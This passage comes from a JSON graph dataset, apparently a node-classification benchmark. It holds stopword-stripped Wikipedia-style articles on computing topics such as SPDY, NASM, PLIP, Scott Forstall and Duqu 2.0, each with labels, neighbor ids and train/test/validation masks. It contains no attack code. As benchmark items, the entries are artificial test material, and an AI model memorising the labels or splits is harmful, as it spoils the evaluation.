    "neighbors": [
      1664,
      2050,
      3465,
      7307,
      9747,
      11418,
      9642,
      7983,
      1075,
      2101,
      9909,
      576,
      3015,
      3916,
      10956,
      7255,
      6231,
      8283,
      10470,
      9451,
      5612,
      10861,
      8303,
      8304,
      9459,
      3578,
      8443,
      7036,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 9987,
    "label": 5,
    "text": "SPDY:spdy spdy pronounced speedy deprecated open-specification networking protocol developed primarily google transporting web content spdy manipulates http traffic particular goals reducing web page load latency improving web security spdy achieves reduced latency compression multiplexing prioritization although depends combination network website deployment conditions name spdy trademark google acronym throughout process core developers spdy involved development http/2 including mike belshe roberto peon february 2015 google announced following recent final ratification http/2 standard support spdy would deprecated support spdy would withdrawn google removed spdy support google chrome 51 mozilla removed firefox 50 apple deprecated technology macos 10.14.4 ios 12.2. group developing spdy stated publicly working toward standardisation available internet draft first draft http/2 used spdy working base specification draft editing implementations spdy exist chromium mozilla firefox opera amazon silk internet explorer safari implementations chromium firefox open source software february 2015 google announced plans remove support spdy favor http/2 http/2 first discussed became apparent spdy gaining traction implementers like mozilla nginx showing significant improvements http/1.x call proposals selection process spdy chosen basis http/2 since number changes based discussion working group feedback implementers february 11 2016 google announced chrome would longer support spdy npn may 15 2016 anniversary rfc 7540 january 25 2019 apple announced spdy would deprecated favor http/2 would removed future releases goal spdy reduce web page load time achieved prioritizing multiplexing transfer web page subresources one connection per client required tls encryption nearly ubiquitous spdy implementations transmission headers gzip- deflate-compressed design contrast http headers sent human-readable text moreover servers may hint even push content instead awaiting individual requests resource web page spdy requires use ssl/tls tls extension alpn security also supports operation plain tcp requirement ssl security avoid incompatibility communication across proxy spdy replace http modifies way http requests responses sent wire means existing server-side applications used without modification spdy-compatible translation layer put place spdy effectively tunnel http https protocols sent spdy http requests processed tokenized simplified compressed example spdy endpoint keeps track headers sent past requests avoid resending headers changed must sent compressed ietf working group httpbis released draft http/2 spdy draft-mbelshe-httpbis-spdy-00 chosen starting point use within https spdy needs tls extension next protocol negotiation npn thus browser server support depends https library openssl 1.0.1 greater introduces npn patches add npn support also written nss tlslite spdy scheduled switch npn application-layer protocol negotiation alpn end 2014 security support provider interface sspi microsoft implemented npn extension tls implementation prevented spdy inclusion latest .net framework versions since spdy specification refined http/2 expected include spdy implementation one could expect microsoft release support http/2 finalized spdy versioned protocol control frames 15 dedicated bits indicate version session protocol approximately 7.1 websites support spdy fielded versions two popular web servers nginx apache major providers spdy traffic although latest version nginx removed spdy support compares adoption rate 8.1 newer http/2 protocol overtaken adoption spdy google services e.g google search gmail ssl-enabled services use spdy available google ads also served spdy-enabled servers brief history spdy support amongst major web players according w3techs spdy-enabled websites use nginx litespeed web server coming second",
    "neighbors": [
      6657,
      10242,
      2579,
      10271,
      2083,
      2085,
      9770,
      559,
      562,
      4661,
      3639,
      5178,
      3643,
      3133,
      5181,
      64,
      9281,
      11332,
      8265,
      5707,
      4687,
      10834,
      6231,
      6747,
      10341,
      10344,
      1642,
      9834,
      115,
      9843,
      4725,
      4728,
      3707,
      1664,
      9860,
      649,
      9868,
      3218,
      9365,
      11413,
      2206,
      3742,
      8351,
      10910,
      9380,
      3237,
      9381,
      3751,
      3752,
      7340,
      10924,
      9908,
      9909,
      7865,
      11449,
      4797,
      7364,
      11466,
      7885,
      5843,
      4310,
      2777,
      8923,
      737,
      4326,
      8432,
      5875,
      8443,
      8956,
      3847,
      7943,
      1297,
      10005,
      5402,
      7965,
      1834,
      5437,
      2887,
      10057,
      2904,
      5469,
      5470,
      5471,
      5472,
      1893,
      11112,
      2922,
      8557,
      367,
      2431,
      6528,
      3971,
      3462,
      6023,
      8584,
      7572,
      5531,
      5026,
      2994,
      2996,
      10171,
      3006,
      7106,
      2509,
      4048,
      4561,
      5078,
      3545,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      5114,
      6651,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 9988,
    "label": 9,
    "text": "Java_EE_Connector_Architecture:java ee connector architecture java ee connector architecture jca java-based tool connecting application servers enterprise information systems eis part enterprise application integration eai solutions jdbc specifically used connect java ee applications databases jca generic architecture connection legacy systems jca developed java community process jsr 16 jca 1.0 jsr 112 jca 1.5 jsr 322 jca 1.6 j2ee version 1.3 requires application servers support jca version 1.0 j2ee version 1.4 requires application servers support jca version 1.5 java ee version 6 requires application servers support jca version 1.6 java ee connector architecture defines standard connecting compliant application server eis defines standard set system-level contracts java ee application server resource adapter system contracts defined version 1.0 java ee connector architecture described specification follows jca version 1.5 adds system contracts specification follows jca adapters built integrate various enterprise information system siebel systems sap ag great plains systems oracle applications etc siebel provides api integrate various platforms like java c++ .net visual basic etc java provides interface called 'java data bean jdb siebel adaptor provides data access via jdb api great plains systems provides interface called econnect integrate platforms sap provides interface java called sap java connector sap jco",
    "neighbors": [
      1035,
      3341,
      11541,
      5658,
      10526,
      10020,
      3114,
      5677,
      2095,
      4913,
      6067,
      4406,
      2106,
      3517,
      3518,
      6334,
      3008,
      10048,
      10817,
      4419,
      11076,
      11582,
      1095,
      3659,
      10317,
      3278,
      847,
      3920,
      4174,
      722,
      4561,
      2901,
      5210,
      3804,
      4959,
      4960,
      1250,
      10340,
      3558,
      1128,
      3560,
      5096,
      9834,
      10857,
      237,
      3954,
      3573,
      3710
    ],
    "mask": "None"
  },
  {
    "node_id": 9989,
    "label": 4,
    "text": "Mocana:mocana mocana founded 2002 san francisco-based company focuses embedded system security industrial control systems internet things iot one main products iot security platform high-performance ultra-optimized os-independent high-assurance security solution device class decoupling security implementation rest application development allows easier development software devices comprising internet things numerous independent networked devices communicate various ways mocana originally launched embedded systems security company recently company shifted focus protecting mobile devices apps data mocana introduced products 2004 focus embedded systems security year company launched embedded security suite software product secure communications networked devices february 2005 based menlo park california company joined freescale semiconductor developers alliance program delivered group first security software 2008 mocana cited example independent company could provide security smartphones mocana ceo adrian turner published article san jose mercury news risks associated non-pc networked devices new york times reported mocana researchers discovered could hack best-selling internet-ready hdtv model unsettling ease highlighted opportunity criminals intercept information like credit card billing details media outlets across u.s. cited point coverage risks associated advances technology mocana sponsored 7th workshop rfid security privacy university massachusetts 2011 launched mobile application protection platform 2011 support android apps added ios app support 2012 following series funding round 2012 total investment mocana 47 million new ceo james isaacs replaced turner september 2013 interim ceo peter graham replaced isaacs april 2016 april 2016 mocana spun mobile security business blue cedar networks william diotte replaced graham ceo may 2016 mocana iot security platform security software solution embedded systems software provides cryptographic controls e.g authentication confidentiality encryption device data integrity verification embedded devices applications company also offers customizable user agreements optional fips 140-2 validated crypto engines access application source code required product design based assumption many assurances security device operating system may compromised obviates necessity infallible systemwide security policies addition mocana offers consulting services evaluating advising security threats networked devices mocana security technology used airplane in-flight entertainment systems medical devices battlefield communications automobile firmware cell phone carrier networks mocana senior analyst robert vamosi cited 2011 piece bloomberg businessweek comparing tech companies approaches security mocana investors include trident capital 2012 intel capital 2011 shasta ventures southern cross venture partners symantec 2010 august 2012 series total 47 million raised official web site mocana.com",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9990,
    "label": 4,
    "text": "Mushroom_Networks:mushroom networks mushroom networks inc. privately held company san diego california mushroom networks founded 2004 electrical computer engineer rene l. cruz cahit akin rajesh mishra spin-off university california san diego ucsd got support von liebig center mushroom networks also received initial funding support itu ventures los angeles investment firm company solely focuses networking products utilizing broadband bonding technology various configurations products provide end-user appearance larger bandwidth aggregating multiple network services load balancing and/or channel bonding mushroom networks developed broadband bonding extensive research development",
    "neighbors": [
      3450,
      10270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9991,
    "label": 2,
    "text": "Chippewa_Operating_System:chippewa operating system chippewa operating system often called cos discontinued operating system cdc 6600 supercomputer generally considered first super computer world chippewa initially developed experimental system also deployed cdc 6000 machines chippewa rather simple job control oriented system derived earlier cdc 3000 later influenced kronos scope name system based chippewa falls research development center cdc wisconsin operating system control data corporation distinct preceded cray operating system also called cos cray",
    "neighbors": [
      6529,
      2179,
      1031,
      1480,
      7432,
      7497,
      7983,
      6675,
      10458,
      11356
    ],
    "mask": "None"
  },
  {
    "node_id": 9992,
    "label": 5,
    "text": "Parallel_Line_Internet_Protocol:parallel line internet protocol parallel line internet protocol plip computer networking protocol direct computer-to-computer communications using parallel port normally used connections printer parallel line internet protocol provides link layer services internet protocol protocol used forming small local area networks large computer networks internet enabling computers without standard dedicated networking hardware ethernet older parallel port devices communicate internet protocol suite standards-based networking model software specification forming small large computer networks local area networks global communication systems internet usually implemented software hardware features use ethernet network interface cards cabling networking switches hubs early personal computers ethernet hardware included design bus adapters initially expensive solution use time standard parallel port typically used connection printer similar output device ports two computers connected so-called null-printer cable sometimes called laplink cable laplink cable connects five output pins parallel port five input pins opposing port direction due lack internal timing parallel ports synchronization implemented via software handshaking four five pins used data transfer one used synchronization logical values pins read written directly software via input output instruction method connect bidirectional data lines two devices order avoid lines active time status lines error slct papout ack busy one device connected data pins d0 d4 respectively transmission byte accomplished dividing two nibbles four bits nibble transmitted setting four data lines according four nibble bits toggling acknowledge line toggle indicates receiving host nibble ready read receiving host read nibble toggles synchronization line tell transmitter nibble read new one may sent hosts use toggle acknowledge lines indicate read write operation performed result host wait toggle host proceeding new operation example transfer nibble 0010 proceeds follows transmitter detects toggle procedure repeated next nibble internet protocol packets sent line encapsulating plip packets transmission line encapsulated packet following structure length checksum calculated second third field actual total length packet three length reported first two bytes packet analogous feature serial communications ports serial line internet protocol slip using null-modem cables allows transfer four bits time rather one generally works higher bitrates method based crynwr standard devised russ nelson ethernet may also used direct computer-to-computer communications method using ethernet crossover cable point-to-point connections usb host-to-host bridges cables also used transfer files two computers network necessary available",
    "neighbors": [
      5472,
      6082,
      9860,
      1893,
      1030,
      3847,
      11332,
      780,
      8432,
      1297,
      5875,
      5118,
      7865,
      2206,
      2431
    ],
    "mask": "None"
  },
  {
    "node_id": 9993,
    "label": 9,
    "text": "Robert_Bernecky:robert bernecky robert bob bernecky canadian computer scientist notable designer implementer apl apl career started i.p sharp associates ipsa 1971 bernecky first published apl work concerned speeding iota epsilon index-of membership primitives functions orders magnitude ipsa colleague roger hui dick lathwell eugene mcdonnell roger moore arthur whitney apl inventor ken iverson continued ipsa acquired reuters 1987-04-01 left reuters 1990 found snake island research works apl compiler parallel-processing technology day bernecky holds master science degree university toronto",
    "neighbors": [
      8987,
      9019,
      1883,
      8695,
      9825,
      11099,
      11625,
      1099,
      4331,
      10668,
      2670,
      3323,
      7630,
      2519,
      4921,
      505,
      1178,
      667
    ],
    "mask": "None"
  },
  {
    "node_id": 9994,
    "label": 1,
    "text": "Database_System_Concepts:database system concepts database system concepts abraham silberschatz hank korth s. sudarshan best-selling textbook database systems often called sailboat book cover sailboats since first edition first edition cover number sailboats labelled names various database models boats sailing desert island towards tropical island wind pushes away prevents arrival book currently 7th edition released march 2019 copyright year 2020 previous editions released 2010 6th edition 2005 5th edition 2001 4th edition 1997 3rd edition 1991 2nd edition 1986 1st edition 1st 2nd editions book authored hank korth abraham silberschatz s. sudarshan co-author since third edition various editions book translated numerous languages including chinese korean portuguese spanish official website book db-book.com",
    "neighbors": [
      10137,
      10471
    ],
    "mask": "Test"
  },
  {
    "node_id": 9995,
    "label": 7,
    "text": "Skytap:skytap skytap inc. private company based seattle washington offering public service cloud computing skytap cloud provides self-service access environments learning developing testing training running enterprise applications company founded illumita 2006 renamed 2008 skytap also product ibm offers public product enables enterprises migrate modernize core business applications ibm product also available la region countries ·argentina ·peru ·chile ·colombia illumita founded brian bershad hank levy steve gribble trio university washington professors done research virtualization cloud computing graduate student david richardson illumita changed name skytap 2008 launched first product skytap virtual lab april year skytap received early funding washington research foundation 2011 organization funded insight venture partners madrona venture group ignition partners bezos expeditions openview venture partners skytap virtual lab expanded scope renamed skytap cloud 2008 2011 skytap best vmworld award public/hybrid cloud computing technologies category skytap cloud company named annual top cloud computing provider lists deloitte geekwire seattle business magazine puget sound business journal march 2018 skytap added john ludeman leadership team svp engineering ludeman joined skytap 30 years engineering experience microsoft skytap cloud enterprise service purpose-built development testing complex applications users import existing virtualized applications build new applications cloud environments accessed modern web browser rest-based application programming interface api command-line interface cli application lifecycle management tool jenkins visual studio tfs etc skytap cloud uses browser-based interface system management hosts library pre-configured virtual machine images using either images imported vms users create sharable configurations one machines securely connect active machines via proprietary html5-based browser client",
    "neighbors": [
      4194,
      7317,
      9974
    ],
    "mask": "None"
  },
  {
    "node_id": 9996,
    "label": 2,
    "text": "Netwide_Assembler:netwide assembler netwide assembler nasm assembler disassembler intel x86 architecture used write 16-bit 32-bit ia-32 64-bit x86-64 programs nasm considered one popular assemblers linux nasm originally written simon tatham assistance julian hall maintained small team led h. peter anvin open-source software released terms simplified 2-clause bsd license nasm output several binary formats including coff omf a.out executable linkable format elf mach-o binary file .bin binary disk image used compile operating systems though position-independent code supported elf object files nasm also binary format called rdoff variety output formats allows retargeting programs virtually x86 operating system os also nasm create flat binary files usable write boot loaders read-only memory rom images various facets os development nasm run non-x86 platforms cross assembler powerpc sparc though generate programs usable machines nasm uses variant intel assembly syntax instead syntax also avoids features automatic generation segment overrides related assume directive used masm compatible assemblers hello world program dos operating system equivalent program linux example similar program microsoft windows 64-bit program apple os x inputs keystroke shows screen nasm principally outputs object files generally executable exception flat binaries e.g. .com inherently limited modern use translate object files executable programs appropriate linker must used visual studio link utility windows ld unix-like systems first release version 0.90 released october 1996 28 november 2007 version 2.00 released adding support x86-64 extensions development versions uploaded sourceforge.net instead checked project git repository binary snapshots available project web page search engine nasm documentation also available july 2009 version 2.07 nasm released simplified 2-clause bsd license previously nasm licensed lgpl led development yasm complete rewrite nasm new bsd license yasm offered support x86-64 earlier nasm also added support gnu assembler syntax relocatable dynamic object file format rdoff used developers test integrity nasm object file output abilities based heavily internal structure nasm essentially consisting header containing serialization output driver function calls followed array sections containing executable code data tools using format including linker loader included nasm distribution version 0.90 released october 1996 nasm supported output flat-format executable files e.g. dos com files version 0.90 simon tatham added support object-file output interface dos .obj files 16-bit code nasm thus lacked 32-bit object format address lack exercise learn object-file interface developer julian hall put together first version rdoff released nasm version 0.91 since initial version one major update rdoff format added record-length indicator header record allowing programs skip records whose format recognise support multiple segments rdoff1 supported three segments text data bss containing uninitialized data",
    "neighbors": [
      5380,
      6664,
      6921,
      9739,
      6797,
      5397,
      9500,
      1915,
      7983,
      5040,
      823,
      9911,
      3386,
      2811,
      4928,
      833,
      6596,
      9668,
      585,
      5065,
      9166,
      6868,
      602,
      477,
      8037,
      9320,
      5356,
      5234,
      499,
      372,
      9331,
      1399,
      3323,
      8700,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9997,
    "label": 9,
    "text": "ScriptBasic:scriptbasic scriptbasic scripting language variant basic source interpreter available c program lgpl license scriptbasic generates intermediary code interpreted runtime environment scriptbasic available windows unix mac os x may embedded programs well create standalone executable files runtime library linked executable available precompiled binaries setup.exe windows uninstall also supported dpkg rpm linux source code form language interpreter fully documented users guide available text html html help tex texi pdf formats scriptbasic developed since 1999 reached fairly matured state terms functions stability precompiled version available windows linux includes command line version standalone web server basic choice developers seek basic variant runs unix well windows mac os x intel basic embeddable option compile applications small footprint executable scriptbasic open interface module developers several external modules developed developer scriptbasic well developers include data base connection handling various database systems mysql postgresql odbc berkeley db others binding library curl png graphics gtk+ graphical user interface sockets regular expressions thread support data compression cgi scriptbasic also open interface preprocessor developers modules may act run-time also compile time thus making possible alter language currently single preprocessor delivers debugger functionality lets basic programmer run basic program line line examine variable contents set break points usual debugging features debugger supports command line version also web server implementation allowing full interactive debugging cgi applications basic architecture interpreter internally object oriented provides clean well documented interface embed interpreter application written c c++ whole source code extensively documented commented outstanding feature compared embeddable script language implementations slides html format english narration realaudio format also available get jump start learning architecture module preprocessor embedding developments scriptbasic supported forum",
    "neighbors": [
      3718,
      5896,
      7691,
      1805,
      6797,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      10033,
      11315,
      9780,
      2485,
      823,
      1594,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      8539,
      92,
      11229,
      225,
      2915,
      9188,
      5733,
      5096,
      11243,
      2541,
      7022,
      8429,
      5747,
      5492,
      759,
      6778,
      2045,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 9998,
    "label": 3,
    "text": "Spectravideo:spectravideo spectravideo international svi american computer manufacturer software house originally called spectravision company founded harry fox 1981 company produced video games software vic-20 home computer atari 2600 home video game console computemate peripheral computers compatible microsoft msx ibm pc company ceased operations 1988 spectravision founded 1981 harry fox alex weiss distributor computer games contracting external developers write software main products gaming cartridges atari 2600 vcs colecovision commodore vic-20 also made world first ergonomic joystick quickshot late 1982 company renamed spectravideo due naming conflict oncommand hotel tv system called spectravision early 1980s company developed 11 games atari 2600 including several titles rarity chase chuckwagon mangia bumper bash titles available columbia house music club company first attempt computer add-on atari 2600 called spectravideo compumate membrane keyboard simple programmability spectravideo first real computers sv-318 sv-328 released 1983 powered z80 3.6 mhz differed amount ram sv-318 32kb sv-328 80kb total 16kb reserved video keyboard style main operating system residing rom version microsoft extended basic computer equipped floppy drive user option boot cp/m instead two computers precedent msx fully compatible standard though changes made design create msx minor system wide range optional hardware example adapter making possible run colecovision games svi may 1983 spectravideo went public sale 1 million shares stock 6.25 per share initial public offering underwritten brokerage d. h. blair co however spectravideo quickly ran trouble december 1983 stock fallen 75 cents per share march 1984 company agreed sell 60 stake hong kong-based bondwell holding deal would also required resignation president harry fox vice-president alex weiss deal set aside spectravideo unable restructure 2.6 million worth debt another deal fanon courier u.s.a. inc. would purchased 80 company struck july fanon courier deal similarly fell fox resigned president september bondwell holding purchasing half company stock installing bondwell vice-president christopher chan new president later computer spectravideo svi-728 made msx compatible svi-738 also msx compatible came built-in 360 kb 3.5 floppy drive last computer produced spectravideo svi-838 also known spectravideo x'press 16 pc msx2 device today spectravideo name used uk-based company called spectravideo plc formerly known ash newman company founded 1977 bought spectravideo brand name bondwell svi owner 1988 sell range logic3 branded products connection old spectravideo products",
    "neighbors": [
      4257,
      3075,
      1958,
      7051,
      10093,
      3406,
      7983,
      9006,
      4337,
      6129,
      10931,
      4409,
      1403,
      9947
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9999,
    "label": 2,
    "text": "Scott_Forstall:scott forstall scott forstall born 1969 american software engineer best known leading original software development team iphone ipad broadway producer best known co-producing tony award-winning fun home eclipsed wife spent career first next apple senior vice president svp ios software apple inc. 2007 october 2012 forstall grew middle-class family kitsap county washington second-born three boys registered-nurse mother jeanne engineer father tom forstall older brother bruce also senior software design engineer microsoft gifted student skills programming came easily difficult others forstall qualified advanced-placement science math class junior high school gained experience programming apple iie computers skipped forward year entering olympic high school bremerton washington early classmates recall immersion competitive chess history general knowledge occasion competing state level achieved 4.0 gpa earned position valedictorian position shared classmate molly brown would later become wife established goal designer high-tech electronics equipment proclaimed interview local newspaper enrolling stanford university graduated 1991 degree symbolic systems next year received master degree computer science also stanford time stanford forstall member phi kappa psi fraternity forstall joined steve jobs next 1992 stayed purchased apple 1997 forstall placed charge designing user interfaces reinvigorated macintosh line 2000 forstall became leading designer mac new aqua user interface known water-themed visual cues translucent icons reflections making rising star company promoted svp january 2003 period supervised creation safari web browser melton senior developer safari team credited forstall willing trust instincts team respecting ability develop browser secret 2005 jobs began planning iphone choice either shrink mac would epic feat engineering enlarge ipod jobs favored former approach pitted macintosh ipod team led forstall tony fadell respectively internal competition forstall fierce competition create ios decision enabled success iphone platform third-party developers using well-known desktop operating system basis allowed many third-party mac developers write software iphone minimal retraining forstall also responsible creating software developer kit programmers build iphone apps well app store within itunes 2006 forstall became responsible mac os x releases avie tevanian stepped company chief software technology officer named svp iphone software forstall received credit ran ios mobile software team like clockwork widely respected ability perform pressure spoken publicly apple worldwide developers conferences including talks mac os x leopard 2006 iphone software development 2008 later release iphone os 2.0 iphone 3g january 27 2010 apple 2010 ipad keynote wwdc 2011 forstall introduced ios 5 forstall also appears ios 5 video narrating three-quarters clip almost every major apple ios special event let talk iphone event launching iphone 4s took stage demonstrate phone siri voice recognition technology originally developed sri international aftermath release ios 6 september 19 2012 proved troubled period apple newly introduced maps application completely designed in-house apple criticized underdeveloped buggy lacking detail addition clock app used design based trademarked swiss railway clock apple failed license forcing apple pay swiss railways reported 21 million compensation october apple reported third-quarter results revenues profits grew less predicted second quarter row company missed analysts expectations october 29 2012 apple announced press release scott forstall leaving apple 2013 serve advisor ceo tim cook interim forstall duties divided among four apple executives design svp jonathan ive assumed leadership apple human interface team craig federighi became new head ios software engineering services chief eddy cue took responsibilities maps siri bob mansfield previously svp hardware engineering unretired oversee new technology group day john browett svp retail dismissed immediately six months job neither forstall apple executive commented publicly departure beyond initial press statement generally presumed forstall left position involuntarily information reasons departure therefore come anonymous sources cook aim since becoming ceo reported building culture harmony meant weeding people disagreeable personalities—people jobs tolerated even held close like forstall although former apple senior engineer michael lopp believes apple ability innovate came tension disagreement steve jobs referred decider final say products features ceo reportedly keeping strong personalities apple check always casting winning vote last word jobs death many executive conflicts became public forstall poor relationship ive mansfield could meeting unless cook mediated reportedly forstall ive cooperate level forced choose two cook reportedly chose retain ive since forstall collaborative forstall close referred mini-steve jobs jobs death left forstall without protector forstall also referred ceo-in-waiting fortune magazine book inside apple written adam lashinsky profile made unpopular apple forstall said responsible departure jean-marie hullot cto applications 2005 tony fadell svp hardware engineering 2008 fadell remarked interview bbc forstall firing justified got deserved jon rubinstein fadell predecessor svp hardware also strained relationship forstall jobs death 2011 reported forstall trying gather power challenge cook siri intelligent personal voice assistant forstall introduced september 2011 received mixed reception observers regarding flop forstall vigorously criticized new maps app introduced ios 6 received criticism inaccuracies apple standards according adam lashinsky fortune apple issued formal apology errors maps forstall refused sign long-standing practice apple forstall directly responsible individual maps refusal sign apology convinced cook forstall go forstall skeuomorphic design style strongly advocated former ceo steve jobs reported also controversial divided apple design team 2012 interview ive head hardware design refused comment ios user interface terms elements 're talking 'm really connected forstall make public appearances departure apple number years report december 2013 said concentrating travel advising charities providing informal advice small companies april 17 2015 forstall made first tweet revealed co-producer broadway version musical fun home first public appearance since departing apple 2012 june 7 2015 forstall-produced musical five awards tonys forstall reportedly working advisor snap inc. june 20 2017 forstall gave first public interview leaving apple interviewed computer history museum john markoff creation iphone 10th anniversary sales launch",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      11289,
      6186,
      6700,
      1074,
      9778,
      9784,
      8253,
      576,
      5194,
      8783,
      4180,
      10838,
      6234,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      7806,
      6783,
      2686,
      10878,
      8842,
      10386,
      5784,
      1177,
      4251,
      2207,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2282,
      1772,
      4844,
      8441,
      2819,
      1290,
      784,
      4888,
      10023,
      4399,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      6495,
      9063,
      10602,
      3948,
      1389,
      11118,
      11629,
      10608,
      6023,
      6539,
      1428,
      6554,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 10000,
    "label": 2,
    "text": "PUFFS_(NetBSD):puffs netbsd pass-to-userspace framework file system puffs netbsd kernel subsystem developed running filesystems userspace added netbsd 5.0 release ported dragonfly bsd 3.2 release netbsd 5.0 puffs includes refuse reimplementation libfuse high-level interface filesystems use low-level libfuse interface kernel fuse interface supported refuse netbsd 6.0 addresses limitation perfuse new compatibility layer emulates fuse kernel interface",
    "neighbors": [
      1286,
      1801,
      274,
      9762,
      8998,
      1071,
      7983,
      11698,
      9671,
      1993,
      8909,
      1361,
      850,
      7383,
      4571,
      1891,
      7907,
      1637,
      10851,
      2415,
      8816,
      2545,
      11506,
      5492,
      2045,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 10001,
    "label": 2,
    "text": "INtime:intime intime pronounced time real time operation system rtos family based 32 bit rtos conceived run time-critical operations cycle-times low 50μs intime rtos runs single-core hyper-threaded multi-core x86 pc platform intel amd supports two binary compatible usage configurations intime windows intime rtos runs alongside microsoft® windows® intime distributed rtos intime runs stand-alone rtos like irmx predecessors intime real-time operating system like dosrmx irmx windows runs concurrently general-purpose operating system single hardware platform intime 1.0 originally introduced 1997 conjunction windows nt operating system since upgraded include support subsequent protected-mode microsoft windows platforms windows xp windows 10 intime also used stand-alone rtos intime binaries able run unchanged running stand-alone node intime rtos unlike windows intime run intel 80386 equivalent processor current versions windows operating system generally require least pentium level processor order boot execute spinning radisys 2000 development work intime continued tenasys corporation 2003 tenasys released version 2.2 intime notable features version 2.2 include",
    "neighbors": [
      10561,
      6797,
      8976,
      9366,
      6207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10002,
    "label": 4,
    "text": "Spanish_Data_Protection_Agency:spanish data protection agency spanish data protection agency aepd agency government spain aepd established royal decree 428/1993 26 march amended organic law 15/1999 protection personal data amendment implemented directive 95/46/ec agency created context spanish constitution 1978 article 18.4 stating law shall restrict use informatics order protect honour personal family privacy spanish citizens well full exercise rights elaborated organic law 5/1992 aepd public law authority enjoying absolute independence public administration responsible response latter point aepd advocated aepd conducting anti-spam investigations since 2004 collaborating foreign agencies united states federal trade commission aepd come conflict google information gathered wi-fi networks google street view images taken asserting verified data location wifi networks identification owners personal data diverse nature communications names surnames messages associated accounts message services user codes passwords collected also demanded removal approximately 90 names search results claiming right forgotten google contesting actions",
    "neighbors": [
      2818,
      3880,
      6344,
      1930,
      9260,
      9901,
      3599,
      1169,
      3858,
      6455,
      1368,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10003,
    "label": 4,
    "text": "Duqu_2.0:duqu 2.0 duqu 2.0 version malware reported 2015 infected computers hotels austria switzerland sites international negotiations iran nuclear program economic sanctions malware infected kaspersky lab months without knowledge believed work unit 8200 kaspersky discovered malware symantec confirmed findings malware variant duqu duqu variant stuxnet software linked israel according guardian software used three zero-day exploits would required funding organization consistent government intelligence agency according kaspersky philosophy way thinking “ duqu 2.0 ” group generation ahead anything seen advanced persistent threats world",
    "neighbors": [
      1024,
      7809,
      8320,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      9904,
      7601,
      1970,
      9395,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      4054,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      9435,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      9569,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      9082,
      2558,
      2815
    ],
    "mask": "None"
  },
  {
    "node_id": 10004,
    "label": 5,
    "text": "Variant_object:variant object variant objects context http objects served origin content server type transmitted data variation i.e uncompressed compressed different languages etc. http/1.1 1997–1999 introduces content/accept headers used http requests responses state variant data presented client server",
    "neighbors": [
      225,
      6629,
      3052,
      11674,
      10452,
      2581,
      53,
      119,
      2901,
      9941,
      10938,
      4797,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10005,
    "label": 5,
    "text": "Link_layer:link layer computer networking link layer lowest layer internet protocol suite networking architecture internet described rfc 1122 rfc 1123 link layer group methods communications protocols operate link host physically connected link physical logical network component used interconnect hosts nodes network link protocol suite methods standards operate adjacent network nodes local area network segment wide area network connection despite different semantics layering tcp/ip osi link layer sometimes described combination data link layer layer 2 physical layer layer 1 osi model however layers tcp/ip descriptions operating scopes application host-to-host network link detailed prescriptions operating procedures data semantics networking technologies rfc 1122 exemplifies local area network protocols ethernet ieee 802 framing protocols point-to-point protocol ppp belong link layer local area networking standards ethernet ieee 802 specifications use terminology seven-layer osi model rather tcp/ip model tcp/ip model general consider physical specifications rather assumes working network infrastructure deliver media level frames link therefore rfc 1122 rfc 1123 definition tcp/ip model discuss hardware issues physical data transmission set standards aspects textbook authors supported interpretation physical data transmission aspects part link layer others assumed physical data transmission standards considered communication protocols part tcp/ip model authors assume hardware layer physical layer link layer several adopt osi term data link layer instead link layer modified description layering predecessor tcp/ip model arpanet reference model rfc 908 1982 aspects link layer referred several poorly defined terms network-access layer network-access protocol well network layer next higher layer called internetwork layer modern text books network-interface layer host-to-network layer network-access layer occur synonyms either link layer data link layer often including physical layer link layer tcp/ip model descriptive realm networking protocols operate local network segment link host connected protocol packets routed networks link layer includes protocols define communication local on-link network nodes fulfill purpose maintaining link states local nodes local network topology usually use protocols based framing packets specific link types core protocols specified internet engineering task force ietf layer address resolution protocol arp reverse address resolution protocol rarp neighbor discovery protocol ndp facility delivering similar functionality arp ipv6 since advent ipv6 open shortest path first ospf considered operate link level well although ipv4 version protocol considered internet layer is-is rfc 1142 another link-state routing protocol fits layer considering tcp/ip model however developed within osi reference stack layer 2 protocol internet standard link layer tcp/ip model often compared directly combination data link layer physical layer open systems interconnection osi protocol stack although congruent degree technical coverage protocols identical link layer tcp/ip still wider scope principle different concept terminology classification may observed certain protocols address resolution protocol arp confined link layer tcp/ip model often said fit osi data link layer network layer general direct strict comparisons avoided layering tcp/ip principal design criterion general considered harmful rfc 3439 another term sometimes encountered network access layer tries suggest closeness layer physical network however use misleading non-standard since 